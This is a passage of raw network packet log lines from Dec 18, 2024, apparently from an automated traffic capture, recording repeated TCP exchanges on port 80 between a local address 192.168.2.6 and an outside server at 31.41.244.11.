                                                                                                                                                              Dec 18, 2024 11:47:28.300925016 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.300956964 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.300980091 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.301501036 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.301542997 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.301553965 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.301584005 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.301614046 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.302381992 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.302392960 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.302403927 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.302436113 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.302462101 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.303355932 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.303376913 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.303388119 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.303425074 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.303462982 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.304222107 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.304233074 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.304239035 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.304280043 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.304929018 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.304944992 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.304956913 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.304991961 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.305003881 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.305696964 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.305710077 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.305721045 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.305761099 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.305798054 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.306534052 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.306546926 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.306556940 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.306591034 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.306618929 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.307357073 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.307416916 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.307545900 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.307606936 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.307624102 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.307657003 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.308397055 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.308446884 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.308459997 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.308480978 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.308492899 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.308785915 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.309333086 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.309345007 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.309356928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.309385061 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.309412003 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.309993029 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.310014009 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.310024977 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.310056925 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.310084105 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.310762882 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.310791969 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.310797930 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.310863972 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.311629057 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.311667919 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.311678886 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.311681986 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.311706066 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.311717987 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.312400103 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.312416077 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.312427044 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.312458992 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.312486887 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.313189030 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.313200951 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.313211918 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.313242912 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.313268900 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.314037085 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.314049006 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.314060926 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.314085007 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.314115047 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.314838886 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.314851046 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.314862013 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.314888954 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.314918041 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.315571070 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.315629005 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.315640926 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.315675020 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.315700054 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.316526890 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.316539049 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.316550970 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.316590071 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.316629887 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.317384958 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.317749023 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.479063988 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.479082108 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.479137897 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.479140997 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.479187012 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.479284048 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.479296923 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.479325056 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.479325056 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.479342937 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.479990959 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.480004072 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.480010986 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.480093002 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.480093002 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.480659962 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.480669022 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.480787039 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.480880976 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.480926037 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.480937958 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.480964899 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.480964899 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.481029987 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.481817007 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.481828928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.481839895 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.481858015 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.481898069 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.482851982 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.482863903 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.482875109 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.482911110 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.482952118 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.483347893 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.483360052 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.483371019 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.483416080 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.483454943 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.484138966 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.484181881 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.484194994 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.484226942 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.484277964 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.485033035 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.485044003 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.485057116 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.485110044 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.485110044 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.485888958 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.485901117 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.485929966 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.486031055 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.486053944 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.486167908 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.486550093 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.486566067 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.486577988 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.486624002 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.486624002 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.487371922 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.487384081 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.487396002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.487416983 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.487535954 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.488197088 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.488209009 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.488221884 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.488271952 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.488953114 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.488964081 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.488976955 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.489046097 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.489046097 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.489784002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.489794970 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.489810944 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.489844084 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.489844084 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.490545034 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.490556002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.490566969 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.490586996 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.490654945 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.491327047 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.491355896 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.491365910 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.491461992 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.492160082 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.492172003 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.492182970 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.492223978 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.492223978 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.492961884 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.492973089 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.492985010 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.493024111 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.493024111 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.494064093 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.494076014 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.494115114 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.494134903 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.494194031 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.494925022 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.494935989 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.494947910 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.495012999 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.495012999 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.495687008 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.495697975 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.495708942 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.495762110 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.495790958 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.496300936 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.496314049 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.496325016 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.496372938 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.496481895 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.497116089 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.497204065 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.497216940 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.497229099 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.497275114 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.497275114 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.498060942 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.498071909 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.498085976 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.498116970 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.498156071 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.498784065 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.498822927 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.498832941 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.498833895 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.498862982 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.499625921 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.499638081 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.499670982 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.499680996 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.499733925 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.500524998 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.500545025 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.500557899 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.500592947 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.500623941 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.501203060 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.501214027 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.501226902 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.501457930 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.502100945 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.502111912 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.502124071 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.502146006 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.502388954 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.502996922 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.503009081 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.503021002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.503108025 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.503108025 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.503704071 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.503715038 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.503726959 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.503760099 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.503818035 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.504473925 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.504484892 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.504532099 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.504569054 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.504904985 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.505331039 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.505362034 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.505373955 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.505400896 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.505425930 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.506109953 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.506122112 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.506133080 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.506205082 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.506804943 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.507059097 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.507334948 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.670273066 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.670290947 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.670315027 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.670329094 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.670336962 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.670341969 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.670357943 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.670429945 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.671101093 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.671118021 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.671130896 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.671173096 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.671173096 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.671981096 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.671994925 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.672008038 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.672059059 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.672059059 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.672661066 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.672694921 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.672708035 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.672719002 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.672754049 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.673567057 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.673583031 CET804983731.41.244.11192.168.2.6
